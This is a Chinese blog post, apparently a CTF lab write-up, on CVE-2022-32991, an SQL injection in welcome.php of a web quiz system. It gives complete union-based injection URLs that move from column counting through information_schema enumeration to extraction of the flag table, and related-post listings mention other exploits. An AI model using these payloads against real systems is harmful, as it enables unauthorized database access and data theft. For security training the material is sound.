春秋云境CVE-2022-32991

最新推荐文章于 2024-05-06 19:33:20 发布
最新推荐文章于 2024-05-06 19:33:20 发布
阅读量649 收藏 7
点赞数 12
分类专栏: 春秋云境 文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64432806/article/details/136780586
版权

该CMS的welcome.php中存在SQL注入攻击。

正文

这关首先需要登录进去才嗯那个找到welcome.php界面,所以我们就直接注册一个账号登录进去就好了。

登录进去之后我们可以看到已经到了welcome.php界面下。点击这三个后发现只有第一个有可以供我们点击的内容,其他两个没有可以点击的,所以我们就可以推测注入点在这个home界面内。

然后我们就可以发现在这三个中只有第一个存在报错拿,那么就可以锁定,注入点就在这里。

然后我们就可以发现在这三个中只有第一个存在报错拿,那么就可以锁定,注入点就在这里。

welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34

观察这关url我们还是不能确定具体哪个参数进行注入,那么就可以采取一个笨一点的办法,那就是从最后一个开始一个个往前测试再删除。

 

当对t参数进行字符串测试发现并没有任何反应那么就可以排除这个参数然后删除再测前一个。

我们可以看到有当是单引号的时候发现报错,说明这个是个单引号闭合的有回显的报错。那么就好办了,这里我用是联合查询。

判断数据库有几列数据

首先来看联合查询,那么我们就需要知道数据库有几列数据,所以用

http://eci-2ze5x4un6q73tb18e3wi.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1' order by 5--+

来测试,发现在这个数据库中有5列数据。

判断显示位在第几列

那么第二步就需要知道他显示出来的数据在第几列,所以我们就可以用

http://eci-2ze5x4un6q73tb18e3wi.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1' union select 1,2,3,4,5--+

来观察发现数据回显是在3这个位置,那么就可以在3这个位置进行注入。

爆数据库名

http://eci-2ze5x4un6q73tb18e3wi.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1' union select 1,2,database(),4,5--+

查表名

http://eci-2ze5x4un6q73tb18e3wi.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1' union select 1,2,(select group_concat(table_name)from information_schema.tables where table_schema='ctf'),4,5--+

然后就很明显发现到了flag

查列名

http://eci-2ze5x4un6q73tb18e3wi.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1' union select 1,2,(select group_concat(column_name)from information_schema.columns where table_schema='ctf' and table_name='flag'),4,5--+

发现flag列名,那么就直接开始查数据

拿到flag

http://eci-2ze5x4un6q73tb18e3wi.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1' union select 1,2,(select group_concat(flag)from flag),4,5--+

到这里我们就已经拿到flag。结束靶场了。

是花花呢
关注
  • 12
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version<3.0.3 3.1.1<Apache spark 版本<3.1.2 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: https://spark.apache.org/downloads.html 2.安全设备路径添加黑名单或者增加WAF规则(临时方案)。
CVE-2022-22965 GUItools单个图形化利用工具
04-06
3月31日,spring 官方通报了 Spring 相关框架存在远程代码执行漏洞,并在 5.3.18 和 5.2.20.RELEASE 中修复了该漏洞。 漏洞评级:严重 影响组件:org.springframework:spring-beans 影响版本:< 5.3.18 和 < 5.2.20.RELEASE 的Spring框架均存在该漏洞,建议用户尽快进行排查处置。 缺陷分析 CVE-2010-1622中曾出现由于参数自动绑定机制导致的问题, 此前通过黑名单的方式修复了该漏洞,但是 JDK9之后引入了 Module,使得可以通过 getModule 绕过前者的黑名单限制,最后导致远程代码执行。
CVE-2022-22963 复现Demo
04-14
CVE-2022-22963 复现Demo,A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it. 存在任何使用问题可以私信本人。
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
05-05
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
春秋云境CVE-2022-32991
一只爱吃橙子的羊
11-29 842
Web Based Quiz System SQL注入漏洞:CVE-2022-32991
春秋云境CVE-2022-32991靶场wp
热门推荐
MONSTERinCAT的博客
10-11 1万+
10月10日10时24分,基于多年来在网络靶场领域的深厚技术及场景积累,永信至诚i春秋正式发布春秋云境.com社区,以春秋云底层能力为基础,以平行仿真技术为支撑,以高仿真内容场景为核心,打造网络安全实战“元宇宙”,通过更加多元、开放、创新的线上技术交流空间,为更广泛的用户群体提供更轻量的靶场体验,助力攻防两端的实战技能提升。春秋云境.com。
春秋云境 CVE-2022-32991
qq_44640313的博客
05-13 265
Web Based Quiz System SQL注入,CVE-2022-32991漏洞
春秋云境靶场CVE-2022-32991漏洞复现(sql手工注入)
zyh1588的博客
11-14 1001
小白复现CVE-2022-32991漏洞,该CMS的welcome.php中存在SQL注入攻击......
春秋云境CVE-2022-32991靶场WP
果粒程
11-25 386
春秋云境CVE-2022-32991靶场WP
春秋云境CVE-2022-24112
一只爱吃橙子的羊
12-04 2173
CVE-2022-24112:Apache Apisix是美国阿帕奇(Apache)基金会的一个云原生的微服务API网关服务。该软件基于 OpenResty 和 etcd 来实现,具备动态路由和插件热加载,适合微服务体系下的 API 管理。 Apache APISIX中存在远程代码执行漏洞,该漏洞源于产品的batch-requests插件未对用户的批处理请求进行有效限制。攻击者可通过该漏洞绕过Admin API的IP限制,容易导致远程代码执行。
春秋云境 CVE-2022-4230 夺旗
05-02
介绍如何 利用 CVE-2022-4230 的 WP Statistics WordPress 插件13.2.9 漏洞利用。 漏洞描述:WP Statistics WordPress 插件13.2.9之前的版本不会转义参数,这可能允许经过身份验证的用户执行 SQL 注入攻击。默认...
春秋云境CVE-2022-30887
一只爱吃橙子的羊
11-29 3861
多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库,并根据到期、产品等各种参数提供各种报告。 该CMS中php_action/editProductImage.php存在任意文件上传漏洞,进而导致任意代码执行。
春秋云境CVE-2022-28060
一只爱吃橙子的羊
11-29 2341
Victor CMS v1.0 /includes/login.php 存在sql注入
春秋云境CVE-2022-24124
一只爱吃橙子的羊
12-02 2325
Casdoor是开源的一个身份和访问管理 (IAM) / 单点登录 (SSO) 平台,带有支持 OAuth 2.0 / OIDC 和 SAML 身份验证的 Web UI 。 Casdoor 1.13.1 之前存在安全漏洞,该漏洞允许攻击者通过api/get-organizations进行攻击。
春秋云境CVE-2022-26965
一只爱吃橙子的羊
11-29 2429
Pluck-CMS-Pluck-4.7.16 后台RCE
医疗行业面临的网络安全挑战及应对策略
运维有小邓
05-06 360
ADManager Plus是一款企业级身份治理和管理解决方案,不仅可以帮助您的组织通过HIPAA规定,还可以通过GDPR、FISMA、SOX、PCI DSS等其他合规要求。除了150多种报告之外,该解决方案还提供了专属于AD和Microsoft 365环境的身份风险评估报告,并提供缓解网络风险的措施。
蓝桥杯-网络安全比赛(6) 模拟实验 Metasploit 控制并获取Windows 登录HASH、LM Hash和NTLM Hash密文解析
最新发布
Superstacks超全栈
05-06 892
计算机中的每个账号(如果是域服务器,则为域内的每个账号)的用户名和密码都存储在sam文件中,当计算机运行时,该文件对所有账号进行锁定,要。这是一个非常重要的设计原则,因为如果密码以明文形式存储,那么任何能够访问存储位置的人或程序都可以轻易地获取到密码,这显然是不安全的。在验证过程中,LSA可能会调用相应的验证程序包(如msv1_0.dll),对用户输入的信息进行处理,并与存储在SAM(安全账户管理器)数据库中的密钥进行对比。最后,winlogon进程对用户登录进行最后的处理,完成整个登录过程。
Web安全研究(九)
至臻求学,胸怀云月
05-05 1158
这段代码事实上实现了一个 webshell 的基本功能,因为它允许通过 URL 参数直接控制和执行服务器端的代码,极其危险。在实际应用开发中,应避免直接使用eval函数,特别是当其包含来自用户输入的数据时。同时,也应该对所有用户输入进行严格的验证和过滤,以减少潜在的安全风险。
春秋云境CVE-2022-29464
09-05
春秋云境CVE-2022-29464是指WSO2 API Manager 文件上传漏洞的CVE编号。这个漏洞允许攻击者通过上传恶意文件来执行任意代码,进而导致服务器受到攻击。根据引用,在GitHub上有一个项目,其中包含了与该漏洞相关的利用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值